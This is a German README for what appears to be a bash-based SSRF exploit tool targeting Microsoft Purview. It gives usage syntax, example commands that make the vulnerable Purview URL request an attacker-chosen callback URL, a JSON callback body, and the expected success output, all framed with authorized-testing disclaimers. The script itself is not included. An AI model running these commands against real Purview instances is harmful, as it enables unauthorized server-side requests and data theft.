
Die SSRF-Schwachstelle in Microsoft Purview
Dieses Repository enthält ein Skript, das für Test- und Bildungszwecke einen SSRF-Exploit (Server-Side Request Forgery) durchführt. Verwenden Sie dieses Tool verantwortungsbewusst und nur in Umgebungen, in denen Sie ausdrücklich die Erlaubnis haben.
bash (Unix-Shell)jq (JSON-Prozessor)curl (Kommandozeilen-Tool für HTTP-Anfragen)./script.sh --exploit <target_url> <purview_url>
| Option | Beschreibung |
|---|---|
-h, --help | Hilfemenü anzeigen. |
--exploit tu pu | SSRF-Exploit mit Ziel- und Purview-URLs durchführen. |
./script.sh -h
Ausgabe:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
Erwartete Ausgabe:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_url, um zu versuchen, eine SSRF-Schwachstelle auszunutzen../script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
Der HTTP-Antwortcode und der Antworttext werden gespeichert, und basierend auf dem Statuscode wird der Erfolg oder Misserfolg des Exploits bestimmt.
Dieses Skript dient nur zu Testzwecken. Missbrauch dieses Skripts kann zu schwerwiegenden rechtlichen Konsequenzen führen. Stellen Sie die Einhaltung aller geltenden Gesetze und ethischen Standards sicher.
Sie können gerne Pull Requests erstellen oder Issues melden.
Dieses Tool ist nur für Bildungszwecke und autorisierte Penetrationstests gedacht. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.